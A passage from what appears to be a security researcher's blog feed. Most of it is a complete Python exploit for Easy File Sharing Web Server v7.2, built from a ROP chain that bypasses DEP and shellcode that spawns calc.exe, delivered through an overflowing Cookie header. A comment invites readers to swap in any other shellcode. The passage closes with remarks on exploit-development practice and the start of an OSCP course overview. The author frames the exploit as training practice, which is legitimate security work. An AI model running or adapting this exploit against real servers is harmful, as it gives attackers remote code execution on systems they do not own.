<span class='line-number'>148</span>
<span class='line-number'>149</span>
<span class='line-number'>150</span>
<span class='line-number'>151</span>
<span class='line-number'>152</span>
<span class='line-number'>153</span>
<span class='line-number'>154</span>
<span class='line-number'>155</span>
<span class='line-number'>156</span>
<span class='line-number'>157</span>
<span class='line-number'>158</span>
<span class='line-number'>159</span>
<span class='line-number'>160</span>
<span class='line-number'>161</span>
<span class='line-number'>162</span>
<span class='line-number'>163</span>
<span class='line-number'>164</span>
<span class='line-number'>165</span>
<span class='line-number'>166</span>
<span class='line-number'>167</span>
<span class='line-number'>168</span>
<span class='line-number'>169</span>
<span class='line-number'>170</span>
<span class='line-number'>171</span>
<span class='line-number'>172</span>
<span class='line-number'>173</span>
<span class='line-number'>174</span>
<span class='line-number'>175</span>
<span class='line-number'>176</span>
<span class='line-number'>177</span>
<span class='line-number'>178</span>
<span class='line-number'>179</span>
<span class='line-number'>180</span>
<span class='line-number'>181</span>
<span class='line-number'>182</span>
<span class='line-number'>183</span>
<span class='line-number'>184</span>
<span class='line-number'>185</span>
<span class='line-number'>186</span>
<span class='line-number'>187</span>
<span class='line-number'>188</span>
<span class='line-number'>189</span>
<span class='line-number'>190</span>
<span class='line-number'>191</span>
<span class='line-number'>192</span>
<span class='line-number'>193</span>
<span class='line-number'>194</span>
<span class='line-number'>195</span>
<span class='line-number'>196</span>
<span class='line-number'>197</span>
<span class='line-number'>198</span>
<span class='line-number'>199</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/env python</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="c"># Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)</span>
</span><span class='line'><span class="c"># Date: 29/11/2015</span>
</span><span class='line'><span class="c"># Exploit Author: Knaps</span>
</span><span class='line'><span class="c"># Contact: @TheKnapsy</span>
</span><span class='line'><span class="c"># Website: http://blog.knapsy.com</span>
</span><span class='line'><span class="c"># Software Link: http://www.sharing-file.com/efssetup.exe</span>
</span><span class='line'><span class="c"># Version: Easy File Sharing Web Server v7.2</span>
</span><span class='line'><span class="c"># Tested on: Windows 7 x64, but should work on any other Windows platform</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="c"># Notes:</span>
</span><span class='line'><span class="c"># - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)</span>
</span><span class='line'><span class="c"># - created for fun &amp; practice, also because it&#39;s not 1998 anymore - gotta bypass that DEP! :)</span>
</span><span class='line'><span class="c"># - bad chars: &#39;\x00&#39; and &#39;\x3b&#39;</span>
</span><span class='line'><span class="c"># - max shellcode size allowed: 1260 bytes</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'>
</span><span class='line'><span class="kn">import</span> <span class="nn">sys</span><span class="o">,</span> <span class="nn">socket</span><span class="o">,</span> <span class="nn">struct</span>
</span><span class='line'>
</span><span class='line'><span class="c"># ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)</span>
</span><span class='line'><span class="c"># Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.</span>
</span><span class='line'><span class="k">def</span> <span class="nf">create_rop_chain</span><span class="p">():</span>
</span><span class='line'>
</span><span class='line'>    <span class="n">rop_gadgets</span> <span class="o">=</span> <span class="p">[</span>
</span><span class='line'>    <span class="c"># Generate value of 201 in EAX</span>
</span><span class='line'>    <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll]</span>
</span><span class='line'>    <span class="mh">0xFFFFFDFF</span><span class="p">,</span>  <span class="c"># Value of &#39;-201&#39;</span>
</span><span class='line'>    <span class="mh">0x100231d1</span><span class="p">,</span>  <span class="c"># NEG EAX # RETN [ImageLoad.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)</span>
</span><span class='line'>    <span class="mh">0x1001da09</span><span class="p">,</span>  <span class="c"># ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Carry on with the ROP as generated by mona.py</span>
</span><span class='line'>    <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c832d0</span><span class="p">,</span>  <span class="c"># ptr to &amp;VirtualProtect() [IAT sqlite3.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location</span>
</span><span class='line'>    <span class="c"># used solely by the remaining part of the above gadget (it doesn&#39;t really do anything for us)</span>
</span><span class='line'>    <span class="mh">0x1001281a</span><span class="p">,</span>  <span class="c"># ADD ESP,4 # RETN [ImageLoad.dll]</span>
</span><span class='line'>    <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]</span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># And carry on further as generated by mona.py</span>
</span><span class='line'>    <span class="mh">0x1002248c</span><span class="p">,</span>  <span class="c"># MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c18d81</span><span class="p">,</span>  <span class="c"># XCHG EAX,EDI # RETN [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x1001d626</span><span class="p">,</span>  <span class="c"># XOR ESI,ESI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10021a3e</span><span class="p">,</span>  <span class="c"># ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x10013ad6</span><span class="p">,</span>  <span class="c"># POP EBP # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c227fa</span><span class="p">,</span>  <span class="c"># &amp; push esp # ret  [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x10022c4c</span><span class="p">,</span>  <span class="c"># XOR EDX,EDX # RETN [ImageLoad.dll] </span>
</span><span class='line'>  
</span><span class='line'>    <span class="c"># Now bunch of ugly increments... unfortunately couldn&#39;t find anything nicer :(</span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x61c066be</span><span class="p">,</span>  <span class="c"># INC EDX # ADD CL,CL # RETN [sqlite3.dll] </span>
</span><span class='line'>      <span class="mh">0x1001b4f6</span><span class="p">,</span>  <span class="c"># POP ECX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x61c73281</span><span class="p">,</span>  <span class="c"># &amp;Writable location [sqlite3.dll]</span>
</span><span class='line'>      <span class="mh">0x100194b3</span><span class="p">,</span>  <span class="c"># POP EDI # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x1001a858</span><span class="p">,</span>  <span class="c"># RETN (ROP NOP) [ImageLoad.dll]</span>
</span><span class='line'>      <span class="mh">0x10015442</span><span class="p">,</span>  <span class="c"># POP EAX # RETN [ImageLoad.dll] </span>
</span><span class='line'>      <span class="mh">0x90909090</span><span class="p">,</span>  <span class="c"># nop</span>
</span><span class='line'>      <span class="mh">0x100240c2</span><span class="p">,</span>  <span class="c"># PUSHAD # RETN [ImageLoad.dll] </span>
</span><span class='line'>    <span class="p">]</span>
</span><span class='line'>    <span class="k">return</span> <span class="s">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&#39;&lt;I&#39;</span><span class="p">,</span> <span class="n">_</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">rop_gadgets</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'>  
</span><span class='line'><span class="c"># Check command line args </span>
</span><span class='line'><span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">1</span><span class="p">:</span>
</span><span class='line'>    <span class="k">print</span> <span class="s">&quot;Usage: python poc.py [host] [port]&quot;</span>
</span><span class='line'>    <span class="nb">exit</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="n">host</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span><span class='line'><span class="n">port</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">rop_offset</span> <span class="o">=</span> <span class="mi">2455</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="c"># move ESP out of the way so the shellcode doesn&#39;t corrupt itself during execution</span>
</span><span class='line'><span class="c"># metasm &gt; add esp,-1500</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">=</span>  <span class="s">&quot;</span><span class="se">\x81\xc4\x24\xfa\xff\xff</span><span class="s">&quot;</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Just as a PoC, spawn calc.exe. Replace with any other shellcode you want</span>
</span><span class='line'><span class="c"># (maximum size of shellcode allowed: 1260 bytes)</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="c"># msfvenom -p windows/exec CMD=calc.exe -b &#39;\x00\x3b&#39; -f python</span>
</span><span class='line'><span class="c"># Payload size: 220 bytes</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3</span><span class="s">&quot;</span>
</span><span class='line'><span class="n">shellcode</span> <span class="o">+=</span> <span class="s">&quot;</span><span class="se">\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85</span><span class="s">&quot;</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">rop_offset</span>                       <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">create_rop_chain</span><span class="p">()</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">shellcode</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">seh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                              <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x1002280a</span><span class="p">)</span>          <span class="c"># overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0xffffffff</span><span class="p">)</span>          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>        <span class="c"># padding</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="n">httpreq</span> <span class="o">=</span> <span class="p">(</span>
</span><span class='line'><span class="s">&quot;GET /changeuser.ghp HTTP/1.1</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;User-Agent: Mozilla/4.0</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Host:&quot;</span> <span class="o">+</span> <span class="n">host</span> <span class="o">+</span> <span class="s">&quot;:&quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="s">&quot;</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept-Language: en-us</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Referer: http://&quot;</span> <span class="o">+</span> <span class="n">host</span> <span class="o">+</span> <span class="s">&quot;/</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Cookie: SESSIONID=6771; UserID=&quot;</span> <span class="o">+</span> <span class="nb">buffer</span> <span class="o">+</span> <span class="s">&quot;; PassWD=;</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Conection: Keep-Alive</span><span class="se">\r\n\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Send payload to the server</span>
</span><span class='line'><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">httpreq</span><span class="p">)</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></code></pre></td></tr></table></div></figure>


<p>I had a lot of fun writing the exploit, I learnt couple new things and also treated it as a bit of a practice after what I&rsquo;ve learned at the before mentioned <a href="https://www.corelan-training.com/index.php/training-2/bootcamp/">Corelan Bootcamp</a> training (which was <strong>AWESOME</strong> and would highly recommend it to anyone interested in exploit development).</p>

<p>Next on the cards is converting the above exploit into Metasploit module and finding some other PoC&rsquo;s that I may be able to convert to properly working exploits.</p>

<p>Ah, only if I could fit some more hours in the day!</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[OSCP - Thoughts and Tips]]></title>
    <link href="http://blog.knapsy.com/blog/2015/03/29/oscp-thoughts-and-tips/"/>
    <updated>2015-03-29T18:18:03+11:00</updated>
    <id>http://blog.knapsy.com/blog/2015/03/29/oscp-thoughts-and-tips</id>
    <content type="html"><![CDATA[<p>I&rsquo;ve been pretty quiet on here for the last couple months as I&rsquo;ve been really busy taking <a href="https://www.offensive-security.com/information-security-training/penetration-testing-with-kali-linux/">Penetration testing with Kali Linux (PWK)</a> training course, followed by the <a href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/">Offensive Security Certified Professional (OSCP)</a> exam.</p>

<p>You&rsquo;ll find tons of other blog posts and reviews about the course and exam itself, so I won&rsquo;t be repeating what you should be able to find elsewhere, instead, I&rsquo;ll just try to give you a brief overview of what it is, how did I find it and some simple tips and tricks that will help you prepare for it.</p>

<!-- more -->


<h2>Overview</h2>

<p>So, what PWK really is? In simple terms, it&rsquo;s a bunch of vulnerable VMs (around 50-ish) in a specially crafted network that is supposed to simulate real corporate environment.</p>

<p>You&rsquo;ve got various different subnets, variety of machines (Windows, Linux, FreeBSD, you name it) with heaps of different vulnerabilities. The goal is to hack into as many of them as you can and obtain the highest privilege access (either Administrator/SYSTEM or root).</p>

<p>You can buy access to the lab for 30, 60 or 90 days and keep extending it for another 30 days.</p>

<p>What&rsquo;s OSCP? It&rsquo;s a certification that you get after you pass the exam, which is again, smaller number of vulnerable VMs that you need to break into. The trick is that you only have 24 hours to do so.</p>

